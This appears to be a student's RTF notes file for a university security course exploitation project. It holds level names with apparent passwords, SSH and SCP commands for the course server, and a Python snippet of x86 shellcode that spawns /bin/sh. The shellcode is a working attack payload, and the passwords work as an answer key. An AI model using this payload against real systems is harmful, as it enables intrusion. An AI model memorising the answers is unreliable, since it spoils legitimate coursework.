{\rtf1\ansi\ansicpg1252\cocoartf2577
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 Menlo-Regular;\f2\fnil\fcharset0 HelveticaNeue;
}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\csgray\c0;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardirnatural\partightenfactor0

\f0\fs24 \cf2 q1:\
remus\
ilearned\
\
q2:\
spica\
alanguage\
\
q3:\
polaris\
tolearn\
\
q4:\
vega\
whyishould\
\
q5:\
d
\f1\fs36 \CocoaLigature0 eneb\
neveruseit
\f0\fs24 \CocoaLigature1 \

\f2\fs36 \cf0 start: \
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 ssh -t cs161-abv@hive20.cs.berkeley.edu \\~cs161/proj1/start\
\
submit: \
ssh -t cs161-abv@hive20.cs.berkeley.edu \\~cs161/proj1/make-submission > proj1-subm.zip\
\
copy: \
scp cs161-abv@hive20.cs.berkeley.edu:proj1-subm.zip ~/Desktop/proj1.zip\
\pard\pardeftab560\slleading20\pardirnatural\partightenfactor0
\cf0 \
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 Questions 1, 2, 4, and 6\
\uc0\u8232 #!/usr/bin/env python2\
shellcode = \\\
        "\\x6a\\x32\\x58\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a" + \\\
        "\\x47\\x58\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f" + \\\
        "\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x54\\x5b\\x50" + \\\
        "\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80"\
}